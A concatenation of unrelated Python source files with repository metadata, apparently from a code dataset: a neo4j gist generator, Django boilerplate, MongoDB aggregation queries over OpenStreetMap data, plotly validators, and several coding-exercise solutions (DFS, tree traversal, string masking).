relations = list()
neo4j = list()
for result in ttl:
rgroup = [x for x in result["@type"] if x in groups][0]
rtype = [x for x in result["@type"] if x != rgroup]
if len(rtype)>0:
rtype = rtype[0]
if rtype in lookup.keys():
node_id = nodes[result_id] # Here is the node_id
result_id = result["@id"]
label = lookup[rtype]
if labeluri in result:
name = result[labeluri][0]["@value"].encode("utf-8")
else:
name = "%s_%s" %(label,count)
# Find things we know about
data = [x for x in result.keys() if x in lookup.keys()]
data_labels = [lookup[d] for d in data]
# We will save a list of properties and values for the node
properties = []
for d in range(len(data)):
datum = data[d]
human_label = data_labels[d]
# If it just has an id, assume it's a relationship
if "@id" in result[datum][0].keys():
if result[datum][0]["@id"] in nodes:
relation_id = nodes[result[datum][0]["@id"]]
relationship = lookup[datum]
relations.append(create_relation(node_id,relation_id,relationship))
count+=1
# If it has type and value, it's a property
if "@value" in result[datum][0].keys():
property_name = lookup[datum]
property_value = result[datum][0]["@value"]
properties.append((property_name,property_value))
# Now create the node!
new_node = create_node(node_id,label,result_id,name,properties)
neo4j.append(new_node.encode("utf-8"))
# Now print to file!
filey = open("%s/graph.gist" %(outfolder),'w')
filey.writelines("= %s\n:neo4j-version: 2.0.0\n:author: Nidash Working Group\n:twitter: @nidm\n:tags: nidm:nidash:informatics:neuroimaging:data-structure\n'''\nThis is a neo4j graph to show the turtle file %s.\n'''\n[source, cypher]\n----\n" %(ttl_file,ttl_file))
for node in neo4j:
filey.writelines(node)
for relation in relations:
filey.writelines(relation)
filey.writelines("----\n//graph\nWe can use cypher to query the graph, here are some examples:\n[source, cypher]\n----\nMATCH (p:peak)-[l:ATLOCATION]->(c:coordinate) RETURN c as coordinate, p as peak\n----\n//table\n'''\n[source, cypher]\n----\nMATCH (p:peak)-[l:ATLOCATION]->(c:coordinate) RETURN c.name as name, c.coordinatevector as coordinate, p.equivalent_zstatistic as z, p.name as peak_name, p.pvalue_uncorrected as pvalue_uncorrected\n----\n//table\n'''\n== NIDM Working Group\n* link:http://nidm.nidash.org/[NIDM Standard]\n")
filey.close()
# Now write a Readme to link the gist
filey = open("%s/README.md" %(outfolder),'w')
filey.writelines("### %s\n" %(ttl_file))
filey.writelines("[view graph](http://gist.neo4j.org/?github-"+ username + "%2F" + repo_name + "%2F%2F" + outfolder + "%2Fgraph.gist)\n")
filey.close()
|
[
"vsochat@stanford.edu"
] |
vsochat@stanford.edu
|
82a746e5f60cd833d1722b8ad31c9a47ba6d461b
|
c1cadf7816acbe2c629dfdf5bfe8f35fa14bfd57
|
/archieve/chinese/manage.py
|
5ca0b7c52363f11fa49628eb6fd16998188a8760
|
[] |
no_license
|
luochengleo/timeperception
|
39c5eb0b0cedf16a02867e6a67e2befc4a118c71
|
6c27ceb51e219d9f18898918d4f3158c94836ff4
|
refs/heads/master
| 2021-01-21T04:46:45.315679
| 2016-07-21T14:34:04
| 2016-07-21T14:34:04
| 43,635,809
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 257
|
py
|
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "timeperception.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
|
[
"luochengleo@gmail.com"
] |
luochengleo@gmail.com
|
c30b0daa268e1d472d04f23d05a26aa61c656f59
|
3f84f51751c4191bb81c9df7094578461fb12a2d
|
/典型90問/012_dfs.py
|
ab1e4b903f8a68201dac254f3a00b79daee48b9e
|
[] |
no_license
|
rikukawamura/atcoder
|
7ff49f1bd8534b99d87fe81ef950e1ba77eee8b8
|
09c0cfe3ce25be56d338614a29e996f4106117cd
|
refs/heads/master
| 2023-08-13T21:21:19.058219
| 2021-09-28T10:02:42
| 2021-09-28T10:02:42
| 329,206,601
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 896
|
py
|
def int_sp():
return map(int, input().split())
def li_int_sp():
return list(map(int, input().split()))
def dfs(s_y, s_x):
if s_y<0 or H<=s_y or s_x<0 or W<=s_x or visited[s_y][s_x] or maps[s_y][s_x]==0:
return
visited[s_y][s_x] = 1
for k in range(4):
dfs(s_y+dy[k], s_x+dx[k])
import pdb
import sys
sys.setrecursionlimit(10**8)
H, W = int_sp()
Q = int(input())
maps = [[0]*W for _ in range(H)]
visited = [[0] * W for _ in range(H)]
dx = [0, 1, 0, -1]
dy = [1, 0, -1, 0]
for _ in range(Q):
#pdb.set_trace()
q = li_int_sp()
if q[0] == 1:
maps[q[1]-1][q[2]-1] = 1
else:
start_y, start_x = q[1], q[2]
goal_y, goal_x = q[3], q[4]
dfs(start_y-1, start_x-1)
if visited[goal_y-1][goal_x-1] == 1:
print('Yes')
else:
print('No')
visited = [[0]*W for _ in range(H)]
|
[
"49993650+rikukawamura@users.noreply.github.com"
] |
49993650+rikukawamura@users.noreply.github.com
|
f5ce0b8c0c2a1214e2899cfff23ea25f55ac12b1
|
c546184629526cff0d40180fc89158ea70c5e21c
|
/Basics of data science and machine learning/5. Tuples, Dictionary and sets/8. Pairs with difference K.py
|
68f7a31e266ceb68ab10d834ada99cfcc13e1541
|
[] |
no_license
|
code-drops/coding-ninjas
|
23ad5d3ea813caf3bd1b04a3733b38d3fb844669
|
fd320e1e4f9e996fbe8d2ef25b20d818b18d4d79
|
refs/heads/master
| 2022-11-23T00:22:31.791976
| 2020-07-05T10:22:00
| 2020-07-05T10:22:00
| 277,277,217
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 825
|
py
|
'''
You are given with an array of integers and an integer K. Write a program to find and print all pairs which have difference K.
Take difference as absolute.
'''
def printPairDiffK(List, k):
# Please add your code here
dict = {}
count, itm = 0, ''
for item in reversed(List):
dict[item] = dict.get(item, 0) + 1
# print(dict)
for i in dict:
# print(i)
if i+k in dict:
for m in range(dict[i]):
for n in range(dict[i+k]):
print(i,i+k)
if i-k in dict:
for m in range(dict[i]):
for n in range(dict[i-k]):
print(i-k,i)
dict[i] = 0
# Main
n=int(input())
l=list(int(i) for i in input().strip().split(' '))
k=int(input())
printPairDiffK(l, k)
|
[
"noreply@github.com"
] |
code-drops.noreply@github.com
|
c7be3292d0f7692e0324adf082264120fa54122f
|
8c87224eb6d2935a6d10bff39f8592a1dd43f549
|
/data_overview.py
|
c5b91d99da176f1a06a9543f44356e24da0112eb
|
[] |
no_license
|
charano/data-wrangle-openstreetmaps-data_1
|
ca3024d78acaf80e85ae3c66a1eee9b72dd6c899
|
59458dff3e1b05216b259b4bcf07da32e28abb57
|
refs/heads/master
| 2021-01-10T13:28:59.052062
| 2015-06-06T16:58:10
| 2015-06-06T16:58:10
| 36,987,866
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,190
|
py
|
import pprint
def get_db(db_name):
from pymongo import MongoClient
client = MongoClient('localhost:27017')
db = client[db_name]
return db
def zip_pipeline():
pipeline = [{"$match" : { "address.postcode" : {"$exists":1}}}
,{"$group" : {"_id" : "$address.postcode",
"count" : {"$sum" : 1}}}
,{"$sort" : {"count" : -1}}
]
return pipeline
def city_pipeline():
pipeline = [{"$match" : { "address.city" : {"$exists":1}}}
,{"$group" : {"_id" : "$address.city",
"count" : {"$sum" : 1}}}
,{"$sort" : {"count" : -1}}
]
return pipeline
def school_pipeline():
pipeline = [{"$match" : {"amenity" : {"$exists" : 1}, "amenity" : "school"}}
,{"$group" : {"_id" : "$name", "count" : {"$sum":1}}}
,{"$sort":{"count":-1}}
,{"$limit":10}
]
return pipeline
def college_pipeline():
pipeline = [{"$match" : {"amenity" : {"$exists" : 1}, "amenity" : "college"}}
,{"$group" : {"_id" : "$name", "count" : {"$sum":1}}}
,{"$sort":{"count":-1}}
,{"$limit":10}
]
return pipeline
def university_pipeline():
pipeline = [{"$match" : {"amenity" : {"$exists" : 1}, "amenity" : "university"}}
,{"$group" : {"_id" : "$name", "count" : {"$sum":1}}}
,{"$sort":{"count":-1}}
,{"$limit":10}
]
return pipeline
def top_user_pipeline():
pipeline = [{"$group" : {"_id" : "$created.user",
"count" : {"$sum" : 1}}}
,{"$sort" : {"count" : -1}}
,{"$limit":25}
]
return pipeline
def one_time_user_pipeline():
pipeline = [{"$group" : {"_id" : "$created.user",
"count" : {"$sum" : 1}}}
,{"$sort" : {"count" : -1}}
,{"$limit":1}
]
return pipeline
def top_amenities_pipeline():
pipeline = [{"$match" : {"amenity" : {"$exists" : 1}}}
,{"$group" : {"_id" : "$amenity", "count" : {"$sum":1}}}
,{"$sort":{"count":-1}}
,{"$limit":100}
]
return pipeline
def top_religions_pipeline():
pipeline = [{"$match" : {"amenity" : {"$exists" : 1}, "amenity" : "place_of_worship"}}
,{"$group" : {"_id" : "$religion", "count" : {"$sum":1}}}
,{"$sort":{"count":-1}}
,{"$limit":10}
]
return pipeline
def top_cuisines_pipeline():
pipeline = [{"$match" : {"amenity" : {"$exists" : 1}, "amenity" : "restaurant"}}
,{"$group" : {"_id" : "$cuisine", "count" : {"$sum":1}}}
,{"$sort":{"count":-1}}
,{"$limit":20}
]
return pipeline
def marietta_cuisines_pipeline():
pipeline = [{"$match" : {"amenity" : {"$exists" : 1}, "amenity" : "restaurant", "address.city" : "Marietta"}}
,{"$group" : {"_id" : "$cuisine", "count" : {"$sum":1}}}
,{"$sort":{"count":-1}}
,{"$limit":10}
]
return pipeline
def decatur_cuisines_pipeline():
pipeline = [{"$match" : {"amenity" : {"$exists" : 1}, "amenity" : "restaurant", "address.city" : "Decatur"}}
,{"$group" : {"_id" : "$cuisine", "count" : {"$sum":1}}}
,{"$sort":{"count":-1}}
,{"$limit":10}
]
return pipeline
def timestamp_pipeline():
pipeline = [{"$group" : {"_id" : {"year" : {"$year" : "$created.timestamp"}},
"count" : {"$sum" : 1}}}
,{"$sort" : {"count" : -1}}
]
return pipeline
def aggregate(db, pipeline):
result = db.cities.aggregate(pipeline)
return result
if __name__ == '__main__':
db = get_db('test')
#Number of documents
count_result = db.atlanta.find().count()
print 'Number of documents'
pprint.pprint(count_result)
#Number of nodes
nodes_result = db.atlanta.find({"type":"node"}).count()
print 'Number of nodes'
pprint.pprint(nodes_result)
#Number of ways
ways_result = db.atlanta.find({"type":"way"}).count()
print 'Number of ways'
pprint.pprint(ways_result)
#Number of unique users
users_result = len(db.atlanta.distinct("created.user"))
print 'Number of unique users'
pprint.pprint(users_result)
#Top 1 contributing user
top_user_pipeline = top_user_pipeline()
top_user_result = db.atlanta.aggregate(top_user_pipeline)
print 'Top contributor'
pprint.pprint(top_user_result)
#Zipcodes
zip_pipeline = zip_pipeline()
zip_result = db.atlanta.aggregate(zip_pipeline)
print 'Zipcodes'
pprint.pprint(zip_result)
#Cities
city_pipeline = city_pipeline()
city_result = db.atlanta.aggregate(city_pipeline)
print 'Cities'
pprint.pprint(city_result)
#Top amenities
top_amenities_pipeline = top_amenities_pipeline()
amenity_result = db.atlanta.aggregate(top_amenities_pipeline)
print 'Amenities'
pprint.pprint(amenity_result)
#Top religions
top_religions_pipeline = top_religions_pipeline()
top_religions_result = db.atlanta.aggregate(top_religions_pipeline)
print 'Top Religions'
pprint.pprint(top_religions_result)
#Top cuisines
top_cuisines_pipeline = top_cuisines_pipeline()
top_cuisines_result = db.atlanta.aggregate(top_cuisines_pipeline)
print 'Top Cuisines'
pprint.pprint(top_cuisines_result)
#Marietta cuisines
marietta_cuisines_pipeline = marietta_cuisines_pipeline()
marietta_cuisines_result = db.atlanta.aggregate(marietta_cuisines_pipeline)
print 'Marietta Cuisines'
pprint.pprint(marietta_cuisines_result)
#Decatur cuisines
decatur_cuisines_pipeline = decatur_cuisines_pipeline()
decatur_cuisines_result = db.atlanta.aggregate(decatur_cuisines_pipeline)
print 'Decatur Cuisines'
pprint.pprint(decatur_cuisines_result)
#Schools
school_pipeline = school_pipeline()
school_result = db.atlanta.aggregate(school_pipeline)
print 'Schools'
pprint.pprint(school_result)
#Colleges
college_pipeline = college_pipeline()
college_result = db.atlanta.aggregate(college_pipeline)
print 'Colleges'
pprint.pprint(college_result)
#Universities
university_pipeline = university_pipeline()
university_result = db.atlanta.aggregate(university_pipeline)
print 'Universities'
pprint.pprint(university_result)
#Number of records created every year
timestamp_pipeline = timestamp_pipeline()
timestamp_result = db.atlanta.aggregate(timestamp_pipeline)
print 'Number of records created/year'
pprint.pprint(timestamp_result)
|
[
"root@ip-10-47-174-141.ec2.internal"
] |
root@ip-10-47-174-141.ec2.internal
|
934e170f6ff5c24743b86be8f724a5ba2956c4f5
|
4410498f2af839d5d086e2a57d7faadb372bba7c
|
/twitterOA1.py
|
a86365d4d0ebcfe3084d7f44847c804675e3c214
|
[] |
no_license
|
Huijuan2015/MyLeetcodeSolutions
|
264e68c4748caac9fc9a4dc3347ae8eae7241217
|
6d4d078db8f3e6994db0dc25410be265459acc04
|
refs/heads/master
| 2020-04-06T05:14:29.103116
| 2016-11-05T21:57:27
| 2016-11-05T21:57:27
| 53,628,844
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,420
|
py
|
import sys
from string import maketrans
def mask_email(email):
body = email[2:].strip()
at = body.find('@')
return 'E:' + body[0] + '*' * 5 + body[at-1:]
def mask_phone(phone):
body = phone[2:].strip()
table = maketrans('', '')
body = body.translate(table, '- ()')
# print body
if body[0] == '+':
start = '+'
body = body[1:]
mid = '-***-***-'
else:
start = ''
mid = '***-***-'
starts = '*' * (len(body) - 10)
return 'P:' + start + starts + mid + phone[-4:]
for line in sys.stdin.readlines():
line = line.strip()
if line[0] == 'E':
print mask_email(line)
else:
print mask_phone(line)
---------
import sys
from string import maketrans
def simplify(exp):
if type(exp) == list:
first = True
nlist = []
for i in xrange(len(exp)):
if type(exp[i]) == list:
if first:
nlist.extend(simplify(exp[i]))
first = False
else:
nlist.append(simplify(exp[i]))
else:
nlist.append(exp[i])
return nlist
else:
return [exp]
def reverse(exp):
if type(exp) == list:
exp = exp[::-1]
for i in xrange(len(exp)):
exp[i] = reverse(exp[i])
return exp
return exp
def parse(s):
s = s.translate(maketrans('', ''), ' ')
expstr, cmds = s.split('/')
cmds = cmds.strip()
ncmds = []
prevS = ''
for cmd in cmds:
if cmd == 'R' or (cmd == 'S' and prevS != cmd):
ncmds.append(cmd)
prevS = cmd
result = []
stack = [result]
for s in expstr:
if s == '(':
stack[-1].append([])
stack.append(stack[-1][-1])
elif s == ')':
stack.pop()
else:
stack[-1].append(s)
return result, ncmds
def extract(exp):
if type(exp) == list:
return '(' + ''.join(map(extract, exp)) + ')'
else:
return exp
# a = [
# # 'A/',
# # 'A B /S',
# # '(AB) C((DE)F)/ R',
# # '(AB) C((DE)F)/ RR',
# '(AB) C((DE)F)/ SSS',
# ]
for line in sys.stdin.readlines():
# for line in a:
exp, cmds = parse(line)
for cmd in cmds:
if cmd == 'S':
exp = simplify(exp)
else:
exp = reverse(exp)
print extract(exp)[1:-1]
|
[
"huijuan1991@hotmail.com"
] |
huijuan1991@hotmail.com
|
47a910a99248290f1384e97ff25bd0b69c23469d
|
bfee538514b48b3f83873c671e4bcaadf0744d69
|
/api/migrations/0001_initial.py
|
bd0b5cfbddd5550b74916de712000ea67229a801
|
[] |
no_license
|
visheshdubey/Dashbike
|
204d9d8411e5afdf0b176b460470a1c6608b52f1
|
5dcb7f5d449034c61ef7dcdef246fbf4209e9e15
|
refs/heads/master
| 2023-07-27T11:35:36.071871
| 2021-09-12T03:03:01
| 2021-09-12T03:03:01
| 178,920,077
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,175
|
py
|
# Generated by Django 2.1.7 on 2019-04-06 05:49
import api.models
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('Users', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Bike',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('bike_name', models.CharField(default='type..', max_length=500)),
('image', models.ImageField(default='def.jpg', upload_to=api.models.scramble_uploaded_filename, verbose_name='media')),
('thumbnail', models.ImageField(blank=True, default='defthumb.jpg', upload_to='', verbose_name='Thumbnail of uploaded image')),
],
),
migrations.CreateModel(
name='BikeModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('description', models.CharField(default='type..', max_length=500)),
('count', models.IntegerField(default=0)),
('bike_rate_hr', models.CharField(blank=True, max_length=500, null=True)),
('bike_rate_h', models.CharField(blank=True, max_length=500, null=True)),
('bike_rate_f', models.CharField(blank=True, max_length=500, null=True)),
('bike_isAvailable', models.BooleanField(default=True)),
('isActive', models.BooleanField(default=True)),
('bike_model', models.ForeignKey(default=None, on_delete=django.db.models.deletion.PROTECT, to='api.Bike')),
('dealer', models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, to='Users.DealerDetail')),
],
),
migrations.CreateModel(
name='Booking',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('pickup_time', models.DateTimeField(default=None)),
('dob', models.DateTimeField(default=None)),
('duration', models.CharField(default=0.0, max_length=500)),
('transaction_amt', models.CharField(default=0.0, max_length=500)),
('ord_id', models.CharField(default=0.0, max_length=500)),
('transaction_id', models.CharField(default=0.0, max_length=500)),
('is_accepted', models.BooleanField(default=False)),
('is_cancelled', models.BooleanField(default=False)),
('is_Booked', models.BooleanField(default=False)),
('bike_model', models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, to='api.BikeModel')),
('client', models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, to='Users.ClientDetail')),
('dealer', models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, to='Users.DealerDetail')),
],
),
]
|
[
"you@example.com"
] |
you@example.com
|
5740cc781e591bcf9a64ae8aec6619af8f1be9d9
|
010279e2ba272d09e9d2c4e903722e5faba2cf7a
|
/contrib/python/plotly/py2/plotly/validators/sankey/node/hoverlabel/__init__.py
|
97dbaf78fea9dc475698f08381ca03fa4d8e4827
|
[
"Apache-2.0",
"MIT"
] |
permissive
|
catboost/catboost
|
854c1a1f439a96f1ae6b48e16644be20aa04dba2
|
f5042e35b945aded77b23470ead62d7eacefde92
|
refs/heads/master
| 2023-09-01T12:14:14.174108
| 2023-09-01T10:01:01
| 2023-09-01T10:22:12
| 97,556,265
| 8,012
| 1,425
|
Apache-2.0
| 2023-09-11T03:32:32
| 2017-07-18T05:29:04
|
Python
|
UTF-8
|
Python
| false
| false
| 6,073
|
py
|
import _plotly_utils.basevalidators
class NamelengthsrcValidator(_plotly_utils.basevalidators.SrcValidator):
def __init__(
self,
plotly_name="namelengthsrc",
parent_name="sankey.node.hoverlabel",
**kwargs
):
super(NamelengthsrcValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "none"),
role=kwargs.pop("role", "info"),
**kwargs
)
import _plotly_utils.basevalidators
class NamelengthValidator(_plotly_utils.basevalidators.IntegerValidator):
def __init__(
self, plotly_name="namelength", parent_name="sankey.node.hoverlabel", **kwargs
):
super(NamelengthValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
array_ok=kwargs.pop("array_ok", True),
edit_type=kwargs.pop("edit_type", "calc"),
min=kwargs.pop("min", -1),
role=kwargs.pop("role", "style"),
**kwargs
)
import _plotly_utils.basevalidators
class FontValidator(_plotly_utils.basevalidators.CompoundValidator):
def __init__(
self, plotly_name="font", parent_name="sankey.node.hoverlabel", **kwargs
):
super(FontValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
data_class_str=kwargs.pop("data_class_str", "Font"),
data_docs=kwargs.pop(
"data_docs",
"""
color
colorsrc
Sets the source reference on Chart Studio Cloud
for color .
family
HTML font family - the typeface that will be
applied by the web browser. The web browser
will only be able to apply a font if it is
available on the system which it operates.
Provide multiple font families, separated by
commas, to indicate the preference in which to
apply fonts if they aren't available on the
system. The Chart Studio Cloud (at
https://chart-studio.plotly.com or on-premise)
generates images on a server, where only a
select number of fonts are installed and
supported. These include "Arial", "Balto",
"Courier New", "Droid Sans",, "Droid Serif",
"Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
familysrc
Sets the source reference on Chart Studio Cloud
for family .
size
sizesrc
Sets the source reference on Chart Studio Cloud
for size .
""",
),
**kwargs
)
import _plotly_utils.basevalidators
class BordercolorsrcValidator(_plotly_utils.basevalidators.SrcValidator):
def __init__(
self,
plotly_name="bordercolorsrc",
parent_name="sankey.node.hoverlabel",
**kwargs
):
super(BordercolorsrcValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "none"),
role=kwargs.pop("role", "info"),
**kwargs
)
import _plotly_utils.basevalidators
class BordercolorValidator(_plotly_utils.basevalidators.ColorValidator):
def __init__(
self, plotly_name="bordercolor", parent_name="sankey.node.hoverlabel", **kwargs
):
super(BordercolorValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
array_ok=kwargs.pop("array_ok", True),
edit_type=kwargs.pop("edit_type", "calc"),
role=kwargs.pop("role", "style"),
**kwargs
)
import _plotly_utils.basevalidators
class BgcolorsrcValidator(_plotly_utils.basevalidators.SrcValidator):
def __init__(
self, plotly_name="bgcolorsrc", parent_name="sankey.node.hoverlabel", **kwargs
):
super(BgcolorsrcValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "none"),
role=kwargs.pop("role", "info"),
**kwargs
)
import _plotly_utils.basevalidators
class BgcolorValidator(_plotly_utils.basevalidators.ColorValidator):
def __init__(
self, plotly_name="bgcolor", parent_name="sankey.node.hoverlabel", **kwargs
):
super(BgcolorValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
array_ok=kwargs.pop("array_ok", True),
edit_type=kwargs.pop("edit_type", "calc"),
role=kwargs.pop("role", "style"),
**kwargs
)
import _plotly_utils.basevalidators
class AlignsrcValidator(_plotly_utils.basevalidators.SrcValidator):
def __init__(
self, plotly_name="alignsrc", parent_name="sankey.node.hoverlabel", **kwargs
):
super(AlignsrcValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "none"),
role=kwargs.pop("role", "info"),
**kwargs
)
import _plotly_utils.basevalidators
class AlignValidator(_plotly_utils.basevalidators.EnumeratedValidator):
def __init__(
self, plotly_name="align", parent_name="sankey.node.hoverlabel", **kwargs
):
super(AlignValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
array_ok=kwargs.pop("array_ok", True),
edit_type=kwargs.pop("edit_type", "calc"),
role=kwargs.pop("role", "style"),
values=kwargs.pop("values", ["left", "right", "auto"]),
**kwargs
)
|
[
"robot-piglet@yandex-team.com"
] |
robot-piglet@yandex-team.com
|
6f1688c722ecdbc98b0e43a88f1b44403696a034
|
de24f83a5e3768a2638ebcf13cbe717e75740168
|
/moodledata/vpl_data/49/usersdata/91/18060/submittedfiles/pico.py
|
24ae75a9ef09d94bf4615d5fc052c73af71e91f6
|
[] |
no_license
|
rafaelperazzo/programacao-web
|
95643423a35c44613b0f64bed05bd34780fe2436
|
170dd5440afb9ee68a973f3de13a99aa4c735d79
|
refs/heads/master
| 2021-01-12T14:06:25.773146
| 2017-12-22T16:05:45
| 2017-12-22T16:05:45
| 69,566,344
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 573
|
py
|
# -*- coding: utf-8 -*-
from __future__ import division
def pico(lista):
posicao=0
for i in range (0,len(lista)-1,1):
if lista[i]>lista[i+1]:
posicao=i
break
cont=0
for i in range (posicao,len(lista)-1,1):
if lista[i]<lista[i+1]:
cont+=1
if cont==0 and posicao!=0:
return True
else:
return False
n = input('Digite a quantidade de elementos da lista: ')
a=[]
for i in range (0,n,1):
a.append(input('digite a:'))
if pico(a):
print('S')
else:
print('N')
|
[
"rafael.mota@ufca.edu.br"
] |
rafael.mota@ufca.edu.br
|
993a6ea2459e638208fb80cbeb1277f085d2f971
|
6a433931dd544e2d9f2b18cff3ce096531b15941
|
/for_loop_sum.py
|
0e496fc2e9d34c9c258fd6d3f0dd3dbb769d5d3d
|
[] |
no_license
|
lunatic-7/python_course_noob-git-
|
b7de1d988c91fd017b645fb1e227e207f3b12b15
|
5e06442151e7a94449ce99158855a608eb035319
|
refs/heads/main
| 2023-08-04T06:55:05.473812
| 2021-09-18T17:20:49
| 2021-09-18T17:20:49
| 407,922,569
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 261
|
py
|
# sum from 1 to 10
# 1 + 2 + 3 + ............. 10
# total = 0
# for i in range(1,11):
# total += i
# print(total)
# take input from user.
n = int(input("enter a number : "))
total = 0
for i in range(1,n+1):
total += i
print(total)
|
[
"wasif1607@gmail.com"
] |
wasif1607@gmail.com
|
944943ff2bf8b9572fd17ce34f32c985818858d4
|
69b93223fc6794123269022a02e5a1dcf130e698
|
/81_Search_in_Rotated_Sorted_Array_II.py
|
880660e9f25e4a6c94f1ec6ef80ea37cb6c242c8
|
[] |
no_license
|
GuangyuZheng/leet_code_python
|
43b984ce98cc889a7e07151004d347cb03b2d9b2
|
266def94df8245f90ea5b6885fc472470b189e51
|
refs/heads/master
| 2020-09-05T18:12:07.649374
| 2020-02-22T09:37:59
| 2020-02-22T09:37:59
| 220,177,486
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 780
|
py
|
from typing import List
class Solution:
def search(self, nums: List[int], target: int) -> bool:
n = len(nums)
start, end = 0, n-1
while start <= end:
mid = (start + end)//2
if nums[mid] == target:
return True
if nums[start] == nums[mid] == nums[end]:
start += 1
end -= 1
continue
if nums[start] <= nums[mid]:
if nums[start] <= target < nums[mid]:
end = mid - 1
else:
start = mid + 1
else:
if nums[mid] < target <= nums[end]:
start = mid + 1
else:
end = mid - 1
return False
|
[
"583621555@qq.com"
] |
583621555@qq.com
|
37ff904c75ff61fe30e0c84cb5bae9b4da25e2d2
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_207/445.py
|
20b1c67b3718d34b8de06cbe25dcb0f54c5ccc12
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460
| 2018-10-14T10:12:47
| 2018-10-14T10:12:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 735
|
py
|
def get_result(R, O, Y, G, B, V):
assert O == 0
assert G == 0
assert V == 0
max_cnt = max(R, Y, B)
if Y + B < max_cnt or R + B < max_cnt or R + Y < max_cnt:
return "IMPOSSIBLE"
cnts = [(R, "R"), (B, "B"), (Y, "Y")]
cnts = sorted(cnts, key=lambda x:x[0], reverse=True)
s = [""] * (3 * max_cnt)
for i in range(cnts[0][0]):
s[3 * i] = cnts[0][1]
for i in range(cnts[1][0]):
s[3 * i + 1] = cnts[1][1]
for i in range(cnts[2][0]):
s[3 * max_cnt - 1 - 3 * i] = cnts[2][1]
return "".join(s)
num_tests = int(input())
for test_id in range(1, num_tests + 1):
N, R, O, Y, G, B, V = map(int, input().strip().split())
res = get_result(R, O, Y, G, B, V)
print("Case #{0}: {1}".format(test_id, res))
|
[
"miliar1732@gmail.com"
] |
miliar1732@gmail.com
|
d53dfb47d2536f19b23f7013ea42ec26c225353e
|
3ff660941132bcaed5bfe309861843bd6657ee37
|
/Trees/Print right side.py
|
b8760b5988ef7e07e1d95586be794cfaa5781333
|
[] |
no_license
|
mrunalhirve12/Interviews2
|
04295cebe1946de1f310857d7fbded11a02f8eb1
|
c48bd0a4e1112804da8bdf2d7e43ab0f2ef00469
|
refs/heads/master
| 2023-03-26T14:35:06.029701
| 2021-03-25T21:31:46
| 2021-03-25T21:31:46
| 351,593,537
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,497
|
py
|
"""
Given a binary tree, imagine yourself standing on the right side of it, return the values of the nodes you can see ordered from top to bottom.
Example:
Input: [1,2,3,null,5,null,4]
Output: [1, 3, 4]
Explanation:
1 <---
/ \
2 3 <---
\ \
5 4 <---
"""
# Definition for a binary tree node.
class TreeNode(object):
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution(object):
def rightSideView(self, root):
"""
:type root: TreeNode
:rtype: List[int]
"""
# res list
res = []
# call the dfs function with parameters as root, length of tree and res array
self.dfs(root, 0, res)
# return res
return res
def dfs(self, root, level, res):
# if not root return empty
if not root:
return
# here we only append if the level and res same, so first node (since we call right subtree first) it gets appended
if len(res) == level:
res.append(root.val)
# call the right & left subtree first, increment levels using recursion
self.dfs(root.right, level + 1, res)
self.dfs(root.left, level + 1, res)
# Driver program to test above function
# Let us construct the BST shown in the figure
root = TreeNode(3)
root.left = TreeNode(9)
root.right = TreeNode(20)
root.left.left = TreeNode(15)
s = Solution()
print(s.rightSideView(root))
|
[
"mrunalhirve@gmail.com"
] |
mrunalhirve@gmail.com
|
1bd8bc7fe24bf5d53d09e0a91e38a3bc344e4337
|
77b16dcd465b497c22cf3c096fa5c7d887d9b0c2
|
/Quintana_Jerrod/Assignments/python_fundamentals/coin_tosses.py
|
454a5cb05d4307c7ee2e66f1826a9f9c91709234
|
[
"MIT"
] |
permissive
|
curest0x1021/Python-Django-Web
|
a7cf8a45e0b924ce23791c18f6a6fb3732c36322
|
6264bc4c90ef1432ba0902c76b567cf3caaae221
|
refs/heads/master
| 2020-04-26T17:14:20.277967
| 2016-10-18T21:54:39
| 2016-10-18T21:54:39
| 173,706,702
| 6
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 394
|
py
|
head = 0
